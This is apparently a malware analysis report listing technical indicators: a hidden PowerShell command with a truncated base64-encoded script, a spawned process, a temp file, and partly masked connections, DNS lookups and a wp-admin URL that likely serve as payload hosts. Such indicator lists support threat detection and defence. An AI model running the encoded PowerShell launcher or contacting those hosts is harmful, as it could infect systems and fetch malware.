Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABIAHkAaQB0AGkAdgBvAGoAbAA9ACcASABrAGQAagB6AGsAZQBsAG0AZQB1AGYAJwA7ACQATgBjAGIAbABuAGIAeABuAHEAIAA9ACAAJwAyADUANAAnADsAJABCAG8AcgB5AGIAbgBoAG8AYQBqAGQAPQAnAEg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1472
- %TEMP%\878862.cvr
- 'ke###ourt.co.uk':80
- 'ue#######et.000webhostapp.com':443
- '67##3.vip':80
- http://67##3.vip/wp-admin/ibwMHePDI/
- 'ue#######et.000webhostapp.com':443
- DNS ASK ke###ourt.co.uk
- DNS ASK ue#######et.000webhostapp.com
- DNS ASK co######aeseducao.online
- DNS ASK um##nc.in
- DNS ASK 67##3.vip